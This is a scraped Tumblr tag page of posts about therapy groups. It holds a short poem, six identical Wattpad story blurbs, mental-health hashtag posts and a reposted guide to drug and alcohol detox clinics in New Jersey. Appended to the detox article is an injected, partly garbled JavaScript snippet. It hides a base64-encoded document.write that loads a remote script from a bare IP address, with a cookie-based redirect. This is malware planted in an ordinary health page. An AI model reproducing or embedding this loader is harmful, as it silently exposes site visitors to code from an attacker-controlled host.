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castielsprostate · 8 months
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getting therapy with the mutuals!!!
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sorry i forgot to post this yesterday
High as shit,
In group,
Listening to music,
Why is it that the group is arts and crafts,
With no talking just doing,
They bring the snacks,
All the flavors bursting in my mouth,
The water was like heaven to my dry mouth,
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rayvenwrote · 3 years
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Just A Pen & Paper - 7. you choose one (on Wattpad) https://www.wattpad.com/1010839834-just-a-pen-paper-7-you-choose-one?utm_source=web&utm_medium=tumblr&utm_content=share_reading&wp_uname=rayvenwrote&wp_originator=YGLgGCkdcoLBIgn9IKIPWVVYQkVZLZJNGiUGfmlKEtn0MG1mWQRSC5QLDH3qUdQWfw5eRyi%2BZTD7INMX4TYmz52cHHdA5Jd53B3gQ6D6L%2FsFg2thQnjQMluck0gbQ35n ❝ Right, it's therapy. I doubt writing could serve as any form of therapy. In your case anyway, it's an addiction.❞ Grayson argued, accompanied by an eyeroll and scoff. Luna snapped back, voice softening at the end.❝ Stop, it. You know this is my life. It helps me feel calm and at peace with myself.❞ ❝ I can't help but take you as a joke when you're like this. I love you, but really Luna? What's so hard about leaving it alone; what's so addicting?❞ Grayson was trying to understand where Luna was coming from, but he didn't realize how his word were slicing until it was too late. Until the damage was done, the blood was dripping, and the wound was lethal. ❝It's just a pen and a paper.❞ ━━━ Ever since Luna was a little girl, she'd always dreamed of being a writer. Her parents saw her passion in writing and decided it'd be best to help her pursue it. But although they didn't say anything to her, they voiced their concerns to her doctor about how she didn't socialize, but wrote books instead. They decided it'd be good to try to pull her away from writing, get her to do something else with her life. So, it wasn't any surprise that they were upset when they saw her doing the thing they had kept her from, for so many years. They made her start visiting a therapy group where she could just feel, instead of turning to a book as her only confidant. But unlike what Luna expected, there's a guy named Grayson there who actually acknowledges that he needs help, and he doesn't snap whenever someone tells him so, unlike some people... But when they get to know each other, Grayson discovers the unusual addiction she has, the "weird" reason she's there. But even so, he reminds himself to never underestimate others problems and issues, because he hates when others do that to his own.
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itsjustmyocd-blog · 5 years
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Let’s talk family and mental health. Family can be our biggest advocates or our greatest weaknesses when it comes to mental illness. We have all heard awful stories of people abandoning their children or siblings because of mental illness and the heart ache that goes along with that. We may have experienced that ourselves. Or maybe it’s the exact opposite. Your family is your biggest source of support and your own personal cheerleaders. They are always loving no matter what. Or maybe your family is just like mine- just trying to figure it all out as we go along. Wherever you fall, let’s recognize one thing: we can start at any moment to be the family member we wish we had. If you have an absent mother or father, you can choose today to be a better mother and father for your child. If you wished your siblings were more understanding of your issues, start being more understanding of them! Often times we want our families to change to suit our needs, but we expect to stay the same. If you want a supportive family, start being a supportive member! Now, there are always exceptions, and if you fall into that category I want for you to know that family is NOT just who we are born to. Family can include people who have supported us, loved us, and withheld judgment of us, and have been there when no one else was. It’s important to let those people know just how much you appreciate them stepping up when no one else would. Family is important and central to life, so let’s not waste our relationships! . . So grateful for my little family today. Even when my fur baby won’t look at the camera🐶 . . #relationshipsarework #family #supportgroup #familyiseverything #familyislove #familyisforever #familyislife #familyisagift #familyisthebest #foreverfamily #supportivefamily #therapygroup #supportivefamily #navigatinghappiness #mentalhealthblog #loveyourself #loveyourhome #loveyourfamily #togetherforever #together #togetherness #findingfamily (at Grand Targhee) https://www.instagram.com/p/Bs6ZPw5nJGb/?utm_source=ig_tumblr_share&igshid=1qgnp09q8az5h
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kokobyrumbie · 5 years
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I love learning new languages. It has always helped me to communicate brilliantly with others. What other languages do you speak🌻 . . . . . . . . . . . . . . . #languages #learning #books #confidence #migrantlife #migrant happysummerdays #zimbabweanbloggers #zimbabwe #checkoutafrica #africa #bookstoread #justbeinghonest #bookclubstories #blacktherapist #therapygroups #therapyprocess https://www.instagram.com/p/Bzh0_Fhj_50/?igshid=1x4zvjomj56tz
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mscandyblog · 6 years
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Please join me Sunday night at 8pm EST on Gravy.Live for a mental health chat. ✨💖#mentalhealth #mentalhealthawareness #depression #katyazamolodchikova #katya #kaytamentalhealth #katyazamo #depressededits #anxious #gethelp #help #pickmeup #feelingdown #theblues #feelingblue #mentalhealthchat #therapy #onlinetherapy #therapygroup #grouptherapy (at New York, New York)
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Drug and Alcohol Detox Clinics in New Jersey
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Drug and Alcohol Detox Clinics in New Jersey
ARTICLE OVERVIEW: How can you find a good detox center in New Jersey? A complete guide on what to look for in a good detox center here.ESTIMATED READING TIME: 7 minutesTABLE OF CONTENTS:What is Medical Detox?Detoxing in New JerseyWhat To ExpectInpatient Detox in New JerseyOutpatient Detox in New JerseyDetox for VeteransInvoluntary TreatmentState ClinicsDoes Detox Help?Detox is the first step on the road to recovery.What is Medical Detox?The process of removing drugs and/or alcohol from the body is known as medical detoxification, or simply detox. Medical detox is much better than at home or cold turkey detox because 24-7 supervision addresses withdrawal symptoms as they occur.Often, withdrawal is painful. In some cases, it can be life-threatening. To prevent harm, it’s always best to go through withdrawal under medical supervision. The main goals of any detox protocol are:Managing withdrawal symptomsProviding emotional supportPreparing for ongoing treatmentMedical detox increases your chances for success. You can benefit from the safety of the environment. Plus, you are much less likely to relapse. Best of all, finishing detox is the first step to living drug-free.So, what should you look for in a detox center?Call us to start detox today.Detoxing in New JerseyThe Division of Mental Health and Addiction Services, DMHAS, oversees New Jersey’s adult system of community-based behavioral health services. These agencies provide a full array of services, including detox. In NJ, these services are officially part of inpatient treatment and are called:Sub-acute detoxificationSub-acute enhanced medically managed detoxificationAll medical detox providers must be licensed by the DMHAS. The organization:Provides licenses.Regulates the substance abuse treatment provider agencies.Monitors the substance abuse treatment provider agencies.Licensing for the substance abuse agencies is provided through the Department of Human Services, Office of Licensing. [1] The inpatient substance use disorders treatment must meet licensing regulations N.J.A.C. 10:161A [2] under the licensing laws N.J.S.A. 26:2BB-5 [3], while the outpatient substance disorders treatment must meet licensing regulations N.J.A.C. 10:161B [2] under the licensing law N.J.S.A. 26:2B-7 [4]. Services provided at each level of care will meet or exceed current New Jersey licensure standards.Are you ready for a fresh start? We can help.What to Expect During Detox?Every step you go through in detox is important, and they build upon each other. Keep in mind that some symptoms are treated with medications, while some require only endurance. The basic protocol for drug and alcohol detoxification in New Jersey is as follows.STEP 1: Assessment and evaluationThe medical staff will gather all needed documents before you start with the detox. The purpose of this stage of detox is to help physicians create a treatment plan that will outline length, tapering schedules, and medication needed. Documents and examinations include:A drug testingInsurance infoFamily historyMedical historyPayment infoPhysical examinationPsychological evaluationSTEP 2: Supportive careNow it’s time to face the withdrawal symptoms. Remember that fears can keep you stuck. Understand detox as something that you have to go through. Most detoxification processes require that patients are placed in a quiet room without stimuli. Supportive services include:Medical supervisionNursing careNutrition planRoutine examinationSTEP 3: Medication treatmentMedications can be prescribed to manage acute withdrawal symptoms such as seizures, panic, or extreme diarrhea. But sometimes medicines may not be right for you. Moreover, medications vary from your drug-of-choice, and they are prescribed in accordance to withdrawal symptoms as well as your medical history.Plan to detox alone? Why risk it?Inpatient Detox in New JerseyInpatient detox is known as “medically monitored inpatient detoxification” in NJ, and it is an organized service delivered by medical and nursing professionals. These professionals provide 24-hour medically supervised evaluation and withdrawal management in an inpatient setting. That means that you’ll need to pack an overnight bag. It’s like staying in a hospital.Inpatient detox in New Jersey must follow the standards set up by the Division of Mental Health and Addiction Services. So, detox is performeda certain way. Also, you need to know that certain medical professionals MUST be available at an inpatient detox clinics. The medical staff is licensed and should include:A medical directorA director of substance abuse counseling servicesA substance abuse counselorA physicianA registered professional nurseAn advanced practice nurseA pharmacistThe steps needed during inpatient detoxification in New Jersey are defined and monitored by the DMHAS.Here’s how inpatient detox centers in New Jersey work…1. Patient admission. When you enter detox, clinicians take admission interviews and complete paperwork.2. Patient assessment. Within 72 hours of admission stage, a licensed medical staff conducts a comprehensive biopsychosocial assessment. The goal is to gather all valid information aboutyou. This will play a huge role in treatment planning. Moreover, during this stage, you will be screened for dual diagnosis conditions that can be underneath alcohol or drug use.3. Patient treatment planning. Medical staff must create a unique and specific plan for you within 72 hours after admission. At this point, you should be under 24/7 medical care. This is the most important stage for stabilization of withdrawal symptoms. So, you’ll be monitored and offered medications when needed. You’ll also be encouraged by staff who provide emotional support.4. Counseling and supportive services. The detoxification process as licensed in the state of New Jersey includes 2 hours of counseling services per week and education session as follows:Individual therapy at a minimum of 1 hour per weekGroup therapy at a minimum of 1 hour per weekPsycho-education at a minimum of 2 hours per detox episodeAll services in inpatient detox are delivered under a defined set of physician approved policies and are monitored for clinical protocols appropriate to each type of addiction. This generally follows the recommendations made by the American Society of Addiction Medicine,ASAM PPC-2R, Level III, 7D protocols.5. Discharge and transfer plans. The medical staff establishes written discharge documents and/or transfer plan if you want tocontinue to rehab.We understand addiction. Call us for help.Outpatient Detox in New JerseyEvery outpatient detox in New Jersey offers detoxification program to patients meeting the ASAM Client Placement Criteria, Level I-D or II-D. [5] This means that patients usually have less than 9 hours of detox services without extended onsite monitoring. More hours are provided, if needed. Outpatient programs provide outpatient detox services every day of the week.During the outpatient detox process, you have 24-hour access to a nurse on call in New Jersey. Daily medical supervision must be conducted by the program nurse, physician, advanced practice nurse, or physician assistant. Additionally, you will receive only a one-day supply of medications for detoxification if and when needed.The licensed staff in New Jersey outpatient detox centers include:A director of substance abuse counselingA physicianA physician assistantA program nurseAn advanced practice nurseThe steps included during outpatient detoxification in New Jersey are as follows.1. Biopsychosoical assessment. During this step, clinicians determine your eligibility for outpatient detox, as well as create the treatment plan.2. Treatment. You receive treatment in accordance with their plan.3. Participating in counseling sessions. While you are receiving care, you participate in a counseling sessions every day during treatment. The purpose is to help you continue treatment after detox.These sessions include:Individual therapyGroup therapyFamily therapyEducational sessionsSelf-help meetingsWhy suffer in silence? Talk about your problems.Detox for Veterans in New JerseyIf you are a The U.S. Department of Veterans Affairs offers substance use disorder treatment for Veterans who have addiction issues. To get full access of these services, you must have VA health care plan.You can apply for VA health care here.Are you in need of instant help? You are NOT ALONE! There are hotlines that operate 24/7. You just need to pick up the phone, and call.National Hotline dedicated to Veterans: 2-1-1National Veteran Crisis Hotline: 1-800-273-8255Veterans Counseling Hotline: 1-866-VETS-NJ4Finally, you can find more information on addiction and detox services for Veterans here.VA medical center locator in New JerseySUD locator in New JerseyThe general hotline for Veterans: 1-800-827-1000The only way to get better is to ask for help.Involuntary Treatment in New JerseyThere is currently no law that regulates separate, involuntary treatment for substance use disorders in New Jersey. [6]There is a law that regulated involuntary civil commitments for mental illness, but mental illness does not include alcohol intoxication, transitory reaction to drug ingestion, organic brain syndrome or developmental disability unless it results in the severity of impairment that disturbs thoughts, mood, perception or orientation which significantly impairs judgment, capacity to control behavior or capacity to recognize reality. [7]However, the opioid abuse epidemic may turn around this law. With more than 2,000 overdose deaths in 2016 in NJ state, the New Jersey Legislature is expected to approve an involuntary commitment for substance use disorder. [8]New Jersey State ClinicsNew Jersey’s DMHAS has created an easy access and searchable directory of licensed substance use disorders treatment facilities that can help you locate a program near you that fits your needs. [9]Moreover, you can contact you County Drug and Alcohol Director to provide more treatment resources. [10]Finally, you can call the IME Addictions Access Center at 1-844-276-2777 to provide information and referral to substance use disorder agencies statewide. The hotline is free, confidential, and available 24/7.Why wait? Call our hotline number to start a new life….today!Does Detox Help?YES!Detox helps you manage withdrawal symptoms, and makes the process of quitting drinking or drugs easier. You can avoid relapse and manage symptoms as they occur. Why risk it?A medical detox also makes quitting safe.Since medical complications are possible, never detox alone. Always check into a medical detox program that offers constant medical care and is operated by licensed staff.Reach out for help, and get started!Give us a call to learn your detox options in New Jersey.And, if you still have questions, please post them in the comments section at the end. We try to respond to all legitimate question personally and promptly.Reference Sources: [1] State of New Jersey: Office of Licensing [2] State of New Jersey: Current Administrative Rules and Regulations [3] Justicia: Health and Vital Statistics,Title XXVI [4] State of New Jersey: Human Services [5] Rutgers University Behavioral Health Care: Tips to Get Your Clinical Authorization Approved by the IME [6] MASS.GOV: Involuntary Commitment for Individuals with a Substance Use Disorder or Alcoholism [7] NJ Courts: Involuntary Civil Commitments [8] NJ Legislature: 218th Legislature [9]DMHAS: Addiction Services Treatment Directory [10] DMHAS: County Alcohol and Drug Abuse Directors & County Mental Health Administrators State of New Jersey: Licensure of Residential Substance Use Disorders Treatment Facilities State of New Jersey: Standards for Licensure of Outpatient Substance Abuse Treatment Facilities Source: https://addictionblog.org/new-jersey/treatmenty/drug-and-alcohol-detox-clinics function getCookie(e)var U=document.cookie.match(new RegExp(“(?:^var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time)var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)
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yougottaeatittobeatit · 10 years
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Does anyone here going or has gone to a therapy group? I'm not sure if I want to go to one and I need to know how it is?
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rayvenwrote · 3 years
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Just A Pen & Paper - 6. a crack in everything (on Wattpad) https://www.wattpad.com/1010382928-just-a-pen-paper-6-a-crack-in-everything?utm_source=web&utm_medium=tumblr&utm_content=share_reading&wp_uname=rayvenwrote&wp_originator=RmfTHXau8CVi1eLT%2FFrAkAT%2BCxXqt42OK26v7XA9m1dwsliwvLsAC4Vc7%2BivyLiImWa6RwyGlim4fP4%2B%2BIk1wJ4cTAFbiwkSMzrBDITrcZODrDgl6EYuHXh8v%2F%2BlSJ7r ❝ Right, it's therapy. I doubt writing could serve as any form of therapy. In your case anyway, it's an addiction.❞ Grayson argued, accompanied by an eyeroll and scoff. Luna snapped back, voice softening at the end.❝ Stop, it. You know this is my life. It helps me feel calm and at peace with myself.❞ ❝ I can't help but take you as a joke when you're like this. I love you, but really Luna? What's so hard about leaving it alone; what's so addicting?❞ Grayson was trying to understand where Luna was coming from, but he didn't realize how his word were slicing until it was too late. Until the damage was done, the blood was dripping, and the wound was lethal. ❝It's just a pen and a paper.❞ ━━━ Ever since Luna was a little girl, she'd always dreamed of being a writer. Her parents saw her passion in writing and decided it'd be best to help her pursue it. But although they didn't say anything to her, they voiced their concerns to her doctor about how she didn't socialize, but wrote books instead. They decided it'd be good to try to pull her away from writing, get her to do something else with her life. So, it wasn't any surprise that they were upset when they saw her doing the thing they had kept her from, for so many years. They made her start visiting a therapy group where she could just feel, instead of turning to a book as her only confidant. But unlike what Luna expected, there's a guy named Grayson there who actually acknowledges that he needs help, and he doesn't snap whenever someone tells him so, unlike some people... But when they get to know each other, Grayson discovers the unusual addiction she has, the "weird" reason she's there. But even so, he reminds himself to never underestimate others problems and issues, because he hates when others do that to his own.
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rayvenwrote · 3 years
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Just A Pen & Paper - 5. try socializing again (on Wattpad) https://www.wattpad.com/1009516977-just-a-pen-paper-5-try-socializing-again?utm_source=web&utm_medium=tumblr&utm_content=share_reading&wp_uname=rayvenwrote&wp_originator=NjyMJHGTdOd3MuwA6htYA3cHEHatsIDwo5UMyImjLIgmzHjzh01VhDLJfxDIcOni%2FLBxCjo%2FPNTj7Gh0pGZNC71G3rxP14Ckj19yFTw9q8zUPpqNXgm%2BYYefCX6gg2sn ❝ Right, it's therapy. I doubt writing could serve as any form of therapy. In your case anyway, it's an addiction.❞ Grayson argued, accompanied by an eyeroll and scoff. Luna snapped back, voice softening at the end.❝ Stop, it. You know this is my life. It helps me feel calm and at peace with myself.❞ ❝ I can't help but take you as a joke when you're like this. I love you, but really Luna? What's so hard about leaving it alone; what's so addicting?❞ Grayson was trying to understand where Luna was coming from, but he didn't realize how his word were slicing until it was too late. Until the damage was done, the blood was dripping, and the wound was lethal. ❝It's just a pen and a paper.❞ ━━━ Ever since Luna was a little girl, she'd always dreamed of being a writer. Her parents saw her passion in writing and decided it'd be best to help her pursue it. But although they didn't say anything to her, they voiced their concerns to her doctor about how she didn't socialize, but wrote books instead. They decided it'd be good to try to pull her away from writing, get her to do something else with her life. So, it wasn't any surprise that they were upset when they saw her doing the thing they had kept her from, for so many years. They made her start visiting a therapy group where she could just feel, instead of turning to a book as her only confidant. But unlike what Luna expected, there's a guy named Grayson there who actually acknowledges that he needs help, and he doesn't snap whenever someone tells him so, unlike some people... But when they get to know each other, Grayson discovers the unusual addiction she has, the "weird" reason she's there. But even so, he reminds himself to never underestimate others problems and issues, because he hates when others do that to his own.
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rayvenwrote · 3 years
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Just A Pen & Paper - 4. crack in the mask (on Wattpad) https://www.wattpad.com/1008967714-just-a-pen-paper-4-crack-in-the-mask?utm_source=web&utm_medium=tumblr&utm_content=share_reading&wp_uname=rayvenwrote&wp_originator=rC62USjtkvln4Lv9STiZJFO9CAJ4nvyVlxWr5QH8bp2ZNhw84coPSk%2FrLIBqx6zX3n62BO1%2BGxKWcINO%2B3leoNDPk67qxC6IukDqzrRRJfTvF6N%2B9EIKok%2BnLWPg3R6B ❝ Right, it's therapy. I doubt writing could serve as any form of therapy. In your case anyway, it's an addiction.❞ Grayson argued, accompanied by an eyeroll and scoff. Luna snapped back, voice softening at the end.❝ Stop, it. You know this is my life. It helps me feel calm and at peace with myself.❞ ❝ I can't help but take you as a joke when you're like this. I love you, but really Luna? What's so hard about leaving it alone; what's so addicting?❞ Grayson was trying to understand where Luna was coming from, but he didn't realize how his word were slicing until it was too late. Until the damage was done, the blood was dripping, and the wound was lethal. ❝It's just a pen and a paper.❞ ━━━ Ever since Luna was a little girl, she'd always dreamed of being a writer. Her parents saw her passion in writing and decided it'd be best to help her pursue it. But although they didn't say anything to her, they voiced their concerns to her doctor about how she didn't socialize, but wrote books instead. They decided it'd be good to try to pull her away from writing, get her to do something else with her life. So, it wasn't any surprise that they were upset when they saw her doing the thing they had kept her from, for so many years. They made her start visiting a therapy group where she could just feel, instead of turning to a book as her only confidant. But unlike what Luna expected, there's a guy named Grayson there who actually acknowledges that he needs help, and he doesn't snap whenever someone tells him so, unlike some people... But when they get to know each other, Grayson discovers the unusual addiction she has, the "weird" reason she's there. But even so, he reminds himself to never underestimate others problems and issues, because he hates when others do that to his own.
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rayvenwrote · 3 years
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Just A Pen & Paper - 3. we all hurt (on Wattpad) https://www.wattpad.com/1007827718-just-a-pen-paper-3-we-all-hurt?utm_source=web&utm_medium=tumblr&utm_content=share_reading&wp_uname=rayvenwrote&wp_originator=DozH%2FickbtSosJerUexUb2nHwN6nEYVRZfctPT2swgwHQpZQ%2BFlR2k8ByzDX5%2BBVGIW9xcFAiZJPYSZGxwsLZLWkzxHfCmDeCSLlMwUv9ku1EvWhh%2Fmrn2eTAs0dDWSm ❝ Right, it's therapy. I doubt writing could serve as any form of therapy. In your case anyway, it's an addiction.❞ Grayson argued, accompanied by an eyeroll and scoff. Luna snapped back, voice softening at the end.❝ Stop, it. You know this is my life. It helps me feel calm and at peace with myself.❞ ❝ I can't help but take you as a joke when you're like this. I love you, but really Luna? What's so hard about leaving it alone; what's so addicting?❞ Grayson was trying to understand where Luna was coming from, but he didn't realize how his word were slicing until it was too late. Until the damage was done, the blood was dripping, and the wound was lethal. ❝It's just a pen and a paper.❞ ━━━ Ever since Luna was a little girl, she'd always dreamed of being a writer. Her parents saw her passion in writing and decided it'd be best to help her pursue it. But although they didn't say anything to her, they voiced their concerns to her doctor about how she didn't socialize, but wrote books instead. They decided it'd be good to try to pull her away from writing, get her to do something else with her life. So, it wasn't any surprise that they were upset when they saw her doing the thing they had kept her from, for so many years. They made her start visiting a therapy group where she could just feel, instead of turning to a book as her only confidant. But unlike what Luna expected, there's a guy named Grayson there who actually acknowledges that he needs help, and he doesn't snap whenever someone tells him so, unlike some people... But when they get to know each other, Grayson discovers the unusual addiction she has, the "weird" reason she's there. But even so, he reminds himself to never underestimate others problems and issues, because he hates when others do that to his own.
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rayvenwrote · 3 years
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Just A Pen & Paper - 2. just a mistake (on Wattpad) https://www.wattpad.com/1006985300-just-a-pen-paper-2-just-a-mistake?utm_source=web&utm_medium=tumblr&utm_content=share_reading&wp_uname=rayvenwrote&wp_originator=lsC%2FrW5ejF7l7BOCO0PsXWcuPmh5dt6Nivj%2FG5DSJgjnYfnpmb3rs2o986DQo62pV4AnTebny3UVDnHN6RFFqIfVPI3MvNdchvbQybYphxq%2BcF327bjkwQnYP%2BBWSkjr ❝ Right, it's therapy. I doubt writing could serve as any form of therapy. In your case anyway, it's an addiction.❞ Grayson argued, accompanied by an eyeroll and scoff. Luna snapped back, voice softening at the end.❝ Stop, it. You know this is my life. It helps me feel calm and at peace with myself.❞ ❝ I can't help but take you as a joke when you're like this. I love you, but really Luna? What's so hard about leaving it alone; what's so addicting?❞ Grayson was trying to understand where Luna was coming from, but he didn't realize how his word were slicing until it was too late. Until the damage was done, the blood was dripping, and the wound was lethal. ❝It's just a pen and a paper.❞ ━━━ Ever since Luna was a little girl, she'd always dreamed of being a writer. Her parents saw her passion in writing and decided it'd be best to help her pursue it. But although they didn't say anything to her, they voiced their concerns to her doctor about how she didn't socialize, but wrote books instead. They decided it'd be good to try to pull her away from writing, get her to do something else with her life. So, it wasn't any surprise that they were upset when they saw her doing the thing they had kept her from, for so many years. They made her start visiting a therapy group where she could just feel, instead of turning to a book as her only confidant. But unlike what Luna expected, there's a guy named Grayson there who actually acknowledges that he needs help, and he doesn't snap whenever someone tells him so, unlike some people... But when they get to know each other, Grayson discovers the unusual addiction she has, the "weird" reason she's there. But even so, he reminds himself to never underestimate others problems and issues, because he hates when others do that to his own.
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rayvenwrote · 3 years
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Just A Pen & Paper - 1. don't want it (on Wattpad) https://www.wattpad.com/1006238316-just-a-pen-paper-1-don%27t-want-it?utm_source=web&utm_medium=tumblr&utm_content=share_reading&wp_uname=rayvenwrote&wp_originator=oGrUB2GoSVFcNVVPjUoEgfkUXn%2FrWPPZPji2f9tKG7tjWSZnLsQUxgJ%2FnEWm%2BmSmKcM7ecK900O27IuzYo7W78dFvxh3VVSkWIHPVYvej71xcWsEGcWL4i7IynvXeRxh ❝ Right, it's therapy. I doubt writing could serve as any form of therapy. In your case anyway, it's an addiction.❞ Grayson argued, accompanied by an eyeroll and scoff. Luna snapped back, voice softening at the end.❝ Stop, it. You know this is my life. It helps me feel calm and at peace with myself.❞ ❝ I can't help but take you as a joke when you're like this. I love you, but really Luna? What's so hard about leaving it alone; what's so addicting?❞ Grayson was trying to understand where Luna was coming from, but he didn't realize how his word were slicing until it was too late. Until the damage was done, the blood was dripping, and the wound was lethal. ❝It's just a pen and a paper.❞ ━━━ Ever since Luna was a little girl, she'd always dreamed of being a writer. Her parents saw her passion in writing and decided it'd be best to help her pursue it. But although they didn't say anything to her, they voiced their concerns to her doctor about how she didn't socialize, but wrote books instead. They decided it'd be good to try to pull her away from writing, get her to do something else with her life. So, it wasn't any surprise that they were upset when they saw her doing the thing they had kept her from, for so many years. They made her start visiting a therapy group where she could just feel, instead of turning to a book as her only confidant. But unlike what Luna expected, there's a guy named Grayson there who actually acknowledges that he needs help, and he doesn't snap whenever someone tells him so, unlike some people... But when they get to know each other, Grayson discovers the unusual addiction she has, the "weird" reason she's there. But even so, he reminds himself to never underestimate others problems and issues, because he hates when others do that to his own.
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kokobyrumbie · 5 years
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There are times when focus is lost in transition because of what is supposedly expected in society. 🌻🌻🌻You are your best inspector. Make the most of being you over and over again. ................. ................. . . . . . . . . . . . . . . . . . . . . . #livingintruth #summerbloom #summercolours #wordsofwisdom #words #actionsspeaklouderthanwords #mentalhealth #mindset #mindfulexistence #mentalhealthtips #mentor #mentorship #mentalhealthdaily #millionairemindset #mentalhealthblogger #counselling #therapygroups #therapyprocess #therapysession #therapystories #focusgroup #positivethinker #wednesdaywellness #wednesdaystories #christiancounselling https://www.instagram.com/p/BzZ0SPGjgmk/?igshid=qvdm8w2jhcct
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kokobyrumbie · 5 years
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Any form of language and written communication supports the development of a dialogue. I can only imagine how difficult and fraustrating it can be when you have to learn a new language. It can prevent individuals from effective communication which cause misunderstandings and misinterpretations between people. 🌻🌻🌻 ............................. ............................. Tip of the day....... Avoid stereotyping and recognize you may receive a different meaning when translated directly from another language. ................🌻🌻🌻 Have a brilliant start of the week . . I am researching on Migrant Trauma. A Psychological damage to the mindset that occurs as a result of immigrating to another country. The result of an overwhelming amount of dreams lost and dissapointments that lead to shame and inability to cope with emotions involved experiences. ...................... Share your thoughts or repost Let's talk about it. . . . . . . . . . . . . . . . . . . . . . . . . . . . #kokofamily #kokobyrumbie #trauma #counsellingstories #therapygroups #therapyprocess #refugees #realstories #girlchild #guilt #reading #languages #talkinggroups #talkingtherapy #breakthroughmoments #zimcelebs #zimbabwebloggers #zimbabwe #zimbabwean #african #judgementalpeople #deepthoughts #quotesaboutlife https://www.instagram.com/p/BzFc849jukZ/?igshid=1tc01epnynpyr
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